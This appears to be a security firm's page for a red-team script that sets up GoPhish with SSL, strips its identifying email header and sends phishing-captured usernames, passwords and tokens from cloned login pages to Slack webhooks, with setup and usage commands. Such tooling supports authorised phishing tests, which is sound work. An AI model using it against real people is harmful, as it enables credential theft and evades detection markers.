Central InfoSec Cyber Security

Central InfoSec

Central InfoSec Penetration Testing

GoPhish Slack Phishing Credential Harvester

GoPhish Slack Phishing Credential Harvester is a penetration testing and red teaming script that installs GoPhish, generates an SLL certificate, and enables Slack integration.

Main Features

  • Modifies GoPhish source code to remove the GoPhish email header
  • Modifies GoPhish source code to allow the GoPhish admin portal to be Internet accessible
  • Creates a GoPhish service for quick and easy starting and stopping
  • Optionally uses a tmux session instead of creating a service
  • Optionally generates an SSL certificate
  • Optionally modifies GoPhish source code to serve the phishing landing page over https
  • Optionally modifies GoPhish source code to add Slack integration
  • Optionally posts data into Slack using bold format instead of code block format


Clone the GitHub repository and allow the script to be executed

git clone https://github.com/centralinfosec/GoPhish-Slack-Phishing-Credential-Harvester /opt/Central-InfoSec/GoPhish-Slack-Phishing-Credential-Harvester
chmod +x /opt/Central-InfoSec/GoPhish-Slack-Phishing-Credential-Harvester/gophish-slack.sh


  • Create two Slack channels
    • One is only for the login data that is submitted
    • One is for the detailed data including details on opened emails, clicked links, and submitted data
  • Clone a login page with the username field named "username", password field named "password", and token field named "token"
  • Run the following command with URLs to the two slack channels:
/opt/Central-InfoSec/GoPhish-Slack-Phishing-Credential-Harvester/gophish-slack.sh https phishingdomain.com SlackLoginDataWebhookUrl SlackDetailedDataWebhookUrl

Sample Usage

Compile GoPhish without the GoPhish email header

gophish-slack.sh http
gophish-slack.sh http phishingdomain.com

Compile GoPhish without the GoPhish email header and generate an SSL certificate

gophish-slack.sh https phishingdomain.com

Compile GoPhish without the GoPhish email header and add Slack integration

gophish-slack.sh http https://hooks.slack.com/services/abc/def/ghi https://hooks.slack.com/services/jkl/mno/pqr
gophish-slack.sh http phishingdomain.com https://hooks.slack.com/services/abc/def/ghi https://hooks.slack.com/services/jkl/mno/pqr

Compile GoPhish without the GoPhish email header, generate an SSL certificate, and add Slack integration

gophish-slack.sh https phishingdomain.com https://hooks.slack.com/services/abc/def/ghi https://hooks.slack.com/services/jkl/mno/pqr

Starting & Stopping GoPhish

Start the GoPhish service

service gophish start

Stop the GoPhish service

service gophish stop

Example Screenshots

GoPhish Generic Phishing Login Page

Slack Phishing Logins Bold Format

Slack Phishing Details Bold Format

Slack Phishing Logins Code Block Format

Slack Phishing Details Code Block Format

Central InfoSec Core Values







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